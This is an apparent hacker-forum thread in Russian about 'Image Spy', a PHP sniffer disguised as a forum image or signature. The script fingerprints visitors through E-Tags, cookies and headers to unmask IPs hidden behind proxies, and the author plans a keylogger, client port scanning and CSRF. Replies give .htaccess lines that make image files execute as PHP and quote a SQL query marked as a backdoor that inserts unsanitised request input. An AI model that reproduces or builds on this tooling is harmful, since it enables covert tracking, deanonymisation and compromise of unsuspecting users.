Image Spy v0.1 Alpha Скрипт находиться в стадии ранней разработки, предназначен для ведения логов с картинок, подписей. Скачать: http://zalil.ru/33691238 (10 Дней, для тех кто хочет получить представление о способе с E-Tag) Пароль: TkXRwq62FddBJjdDpPNDyFzbg6rqAq1StOfYO6Snehog5apLTJvv92P6jItjZQ7UbeVhqlijba1PcdNOEDMYSUbZGclz0f6O1alJxI6FMBsuyjGOQqegQ65YHzU4O9Crt6qRRRcCOmWuGmLcFPvPvwljx0yhoUFuJbr51RWuMQPJlQlFjPRmVyYCoA5EFKBcsJXlWNpgRgWLAxhL92qbYa481HlgAEqM0TiXbpCQmUn10aC8UUVO1IZL7vmRO851 Тему создаю только ради обсуждения различных возможных способов добычи информации, код в архиве очень сырой и использоваться по назначению пока не может. В настоящее время реализована функция выдачи уникального E-Tag, по которому можно определять разные IP в случае использовании Proxy. Будет реализовано: Удобная админка Выдача куков и уникальной даты модификации по усмотрению пользователя Оптимизация хранения E-Tag, оптимизация скриптов Примерная будущая админка: http://s002.radikal.ru/i199/1208/22/807145992227.png Для ведения логов с античата требуется разместить скрипт на HTTPS хостинге. Следующая версия будет полноценна, выложена в начале-середине сентября. За это время хотел бы обсудить с вами способы различной добычи информации(Реализую всё, что будет в моих силах), конспирации скрипта под обычную картинку и предоставление логов в админке. В настоящее время у меня есть идеи в первую очередь к сканированию определённых портов клиента, фоновому поиску по базам прокси, добавление возможностей описанных M_Script(CSS в HTTP заголовках, http://forum.antichat.ru/showpost.php?p=2878341&postcount=9) , http://forum.antichat.ru/showpost.php?p=2878334&postcount=8
Как вижу, ни у кого нет предложений. Проект идёт на паблик, в данный момент реализовано всё что указано в теме, кроме SMB сервера(Не протестирован на Windows), и админки - т. к. с ней нужно разбираться отдельно, и возможно никто её пользоваться и не будет. В дальнейшем будет и SMB сервер, и этот проект будет соединён с IMS(Код я не выкладывал), идеи которой будут сюда вложены, в принципе это можно так и назвать. Результаты теста на других форумах(Через подпись) весьма неплохие. На данный момент меня ограничивает то, что могут быть недовольства на счёт темы заголовков, хотя они содержаться в спецификации HTTP. Хотелось бы услышать мнение M_Script, после чего тему можно удалить.
Для теста на реальной странице. Опера не совсем конкретно обрабатывает запрос на 127.0.0.1 через 127.0.0.1 прокси, поэтому не 127.0.0.1 а media. UDP: M_Script, ок, +У меня остались идеи из IMS, которые можно сюда добавить
Предлагаю не торопиться и оставить тему здесь. Есть идеи и наработки не конкретно по этой теме, но достаточно близкие к ней.
v0.2 Версия v0.2, включил всё, что работает полностью(см. Выше). SMB Сервер, Аминка, работа с Iframe для CSRF, мультикартиночность и т. п. в разработке. +Планирую доработать и включить возможности JQuery KeyLogger, которым до этого проэкта было негде особо пользоваться. В этой версии: Работа с куками Работа с E-Tag Работа c датой последней модификации Определение разрешения экрана при работе из оперы в отдельной вкладке(Link, в этой версии в файле ресурсопотребный цикл, выходные данные = 600Кб css, но их можно уменьшить сократив длину пути к картинке и максимальное разрешение, которое сейчас составляет 4000. Так же несовсем понятно, лучше определять разрешение экрана или области браузера, - для Link без вложенных циклов >64Мб возможно определить только две переменные. Запись хэша отдельных заголовков браузера(Вариантов скорее всего менее 500, т.к. из PHP невозможно получить чистые заголовки) Запись Proxy-Заголовков Возможность создания быстрого парсинга с Referer-страници Не всё работает стабльно, но в следующей версией это обеспечу, т. к. проект придётся значительно расширять. Сейчас у меня гораздо больше идей, чем было изначально - в основном для более удобной автоматизации и работы с несколькими порталами. -Версия до конца не протестирована на наличие ошибок/уязвимостей С следующей версией можно будет нормально работать(В плане удобства и полноценной защиты от пользователей), будет добавлено разделение на различные форумы/функции т.е. однозначности проекта не будет.
Сейчас версия не разрабатывается из-за наличия другого собственного ПО для получения этой информации, но может кому-то пригодится. Все спущенные тема не получили абсолютно никакой заинтересованности, если есть что предложить - пишите в ПМ.
Найти её очень просто, её нет Это не полная разработка, информацию можно смотреть напрямую в MySQL. На следующей неделе начинается разработка более-усовершенствованного ПО для этих-же целей, скорее всего ближайшее время в этот раздел оно выкладываться не будет, но если у вас есть предложения/пожелания мы можем их учесть.
Code: $MyID = $MySQLi->MySQLi->query("SELECT `UserData` FROM `imglog` WHERE ip = '{$_SERVER['REMOTE_ADDR']}' and id = {$_GET['id']}")/*Backdoor*/ Забавно Протестировать так и не получилось, на двух серверах выдаётся ошибка 500, но задумка гениальная, с сохранением сессий, назначением кукисов для дальнейшего выцепления айпи адресов, они же могут меняться, и если человек на том же античате хоть раз зайдет с реального айпи, то.. "влип очкарик" Поковырял немножко код, так и не смог найти алгоритма определения разрешения экрана в опере... насколько я понял, 90% кода базируется на парсинге массива _SERVER вытаскивая из него нужную информацию, впринципе в любом современном сниффере сохранение всего массива _SERVER уже классический способ, а там информация как на ладони. Ещё небольшое замечание из личного опыта, в корне .htaccess назначение файлов исполняемыми: Code: AddType application/x-httpd-php .php .jpg .gif .png .css Так на определённых серверах работать не будет, с чем это связано не знаю, видимо особые конфигурации апача, поэтому перед данной строкой рекомендуется вставлять: Code: RemoveHandler .gif AddType application/x-httpd-php .gif Это универсальный способ работающий везде, по крайней мере у меня сбоев ещё не давал. А так, буду следить за релизом, это очень интересная разработка.
